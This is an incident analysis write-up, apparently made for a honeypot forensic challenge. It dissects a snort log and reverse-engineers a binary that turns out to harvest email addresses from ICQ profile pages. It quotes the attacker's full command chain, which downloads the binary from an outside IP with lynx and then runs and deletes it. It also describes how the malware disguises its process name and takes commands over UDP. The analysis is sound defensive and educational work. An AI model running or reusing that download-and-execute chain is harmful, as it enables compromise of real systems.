This page provides a description of the general methodologies I used to determine exactly what happened in the attack presented in the snort log file.
I used a number of different methods in the process, including log analysis and reverse engineering techniques such as disassembly and debugging.
Used to run foo (after first disconnecting it from the rest of the network!)
Used to communicate with foo, and analyse network traffic.
To look at the behaviour on IP protocol 11, I initially attempted
to get decoder.c
provided on the challenge page to work. However,
decoder.c
requires libpcap
to be installed, and I had trouble
installing it under Cygwin. Instead, I used the
decoder
perl script written by Dion Mendel for the Reverse Challenge project
(the script expects to find an executable called tcpdump - this can be
achieved under Cygwin by creating a symbolic link to windump).
$ bin/decoder snort-0718\@1401.log > decode.log
Of all the commands executed, the 4th last is the most interesting. So, breaking down the command line into its separate fragments, we get:
killall -9 ttserve
:
Kills any existing ttserve
processes.lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve
:
Downloads foo
from 216.242.103.2
, storing it as
/tmp/ttserve
chmod 755 /tmp/ttserve
:
Makes /tmp/ttserve
executablecd /tmp
:
Changes to the /tmp
directory./ttserve
:
Runs the ttserve
(or foo
) executablerm -rf /tmp/ttserve ./ttserve
:
Removes ttserve
(twice, for good effect?)To understand what the attacker is trying to achieve, it is therefore
necessary to understand what foo/ttserve
(henceforth referred to as foo
) does.
To obtain foo, I used Ethereal's Follow TCP Stream tool on packet 73, which provided the entire HTTP communication between the honeypot machine and the webserver.
The request headers are provided here.
GET /foo HTTP/1.0 Host: 216.242.103.2:8882 Accept: text/html, text/plain, audio/mod, image/*, video/*, video/mpeg, application/pgp, application/pgp, application/pdf, message/partial, message/external-body, application/postscript, x-be2, application/andrew-inset, text/richtext, text/enriched Accept: x-sun-attachment, audio-file, postscript-file, default, mail-file, sun-deskset-message, application/x-metamail-patch, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress Accept-Language: en User-Agent: Lynx/2.8.3dev.18 libwww-FM/2.14
I then saved the result, and opened it in a text editor, snipped the request and response headers, and stored the result as foo for analysis.
Essentially, I followed the procedure described by Dion Mendel, the winner of the Reverse Challenge. I describe the technicalities of the reverse engineering separately. The results of the reverse engineering can be seen in an attempt to recreate the C code.
The first thing that foo does is to set its name to '(nfsiod)', to disguise itself in process listings. The sequence of function calls
fork(); setsid(); setuid(); seteuid(); fork(); chdir("/");
is a clear indication that it then becomes a daemon.
Going back to the packet log, in packet 529, a UDP communication is made from the honeypot server to "11.11.11.11" (spoofed, naturally - the actual address is 216.242.103.2) on port 53413 with data "GU\n". This is presumably foo "phoning home", saying "I'm ready", as this is immediately succeeded by the response "DU9207100". These are the only non-DNS UDP commands used in the captured session
In the part of the code referring to DU (lines 080485ce onward), it is clear that
on receiving a DU, an iosscanf("%lu", &var)
is
performed - this obviously reads in the remainder of the command (the
9207100 part).
This command results in the next pattern of activity in the packet logs, which is a sequence of requests to web.icq.com, essentially getting the profile pages of all users with user ids in the range 9207100 - 9207199.
From these two pieces of evidence, the instruction DU9207100 is apparently a command to get the pages of 100 userids, starting from 9207100.
While it is difficult to determine from the raw code what the attacker is trying to achieve, I had two thoughts - a distributed denial of service, or email address harvesting. While investigating further, I recalled I'd seen a large block of code, with lots of compares to small constants (starting around 080487d4). Not wishing to go through every compare by hand, I wrote some C to substitute constants in the range 0x20-0x7f with their ASCII equivalents. The results are below:
$ bin/chartest dump4 > chartest.res
The lines from 0804885c to 080488d4, (cmpb with m,a,i,l,t,o,:, in sequence) strongly suggest to me that this is an email address harvester.
Once I had exhausted my hand decompilation abilities, I moved onto active reverse engineering, through running foo. As by now I understood what all the system calls did, I was reasonably happy to run foo, with two alterations. I used hexedit to change the UDP connection address to one of my local machines (a Sun Sparcstation LX), and I disconnected my hub from the external network. This allowed me to sniff the local network, without any accidental external leaks.
I tracked the behaviour of foo by using strace, a program that's standard on Linux boxes (and probably some others too). This allowed me to check for things I'd missed in the decompilation - one of which was the port allocation in the sendto call in open_udp.
At the other end, I created a connection handler to receive UDP calls, and respond back with user-defined responses.
I was then able to use strace of foo at one end, and snoop the network while running the handler at the other end.
Unfortunately, I was able to do little with the handler program other than confirm that on receipt of a DU request, successive attempts to contact web.icq.com (which was unreachable, as I'd disconnected the network) were made.
Without the Reverse Challenge, it would have been significantly
harder for me to have even started reverse engineering foo
.
In particular, the analysis of the-binary
by Dion Mendel
formed the basis of the reverse engineering here, and the
tools
he provided were a valuable asset.